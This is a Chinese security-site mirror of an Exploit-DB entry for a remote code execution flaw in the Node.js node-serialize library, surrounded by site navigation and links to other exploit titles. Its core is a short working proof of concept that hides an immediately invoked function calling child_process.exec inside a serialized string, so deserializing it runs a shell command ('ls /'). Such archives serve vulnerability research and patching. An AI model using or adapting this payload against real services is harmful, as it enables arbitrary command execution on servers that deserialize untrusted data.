体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Node.JS – ‘node-serialize’ Remote Code Execution

  • Exploit Database
  • 103 阅读
  • 作者: OpSecX
    日期: 2017-02-08
  • 类别:
    • remote
    平台:
    • linux
  • 来源:https://www.exploit-db.com/exploits/45265/
  • 1
    2
    3
    4
    var serialize = require('node-serialize');
    var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
    serialize.unserialize(payload);
     
上一篇: Fully Featured News CMS 1.0 – ‘id’ SQL Injection
下一篇: WordPress Plugin Insert PHP 3.3.1 – PHP Code Injection
  • last Exploits
  • Node.JS – ‘node-serialize’ Remote Code Execution的更多信息
  • Google Android 2.0/2.1 – Use-After-Free Remote Code Execution on Webkit:
  • Java Deployment Toolkit – Performs Insufficient Validation of Parameters:
  • Oracle WebLogic Server 10.3.6.0.0 / 12.x – Remote Command Execution:
  • Geovision Inc. IP Camera/Video/Access Control – Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access:
  • SysGauge Server 3.6.18 – Remote Buffer Overflow:
  • GroundWork – ‘monarch_scan.cgi’ OS Command Injection (Metasploit):
  • HomeMatic Zentrale CCU2 – Remote Code Execution:
  • Quick TFTP Server Pro 2.1 – Transfer-Mode Overflow (Metasploit):
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏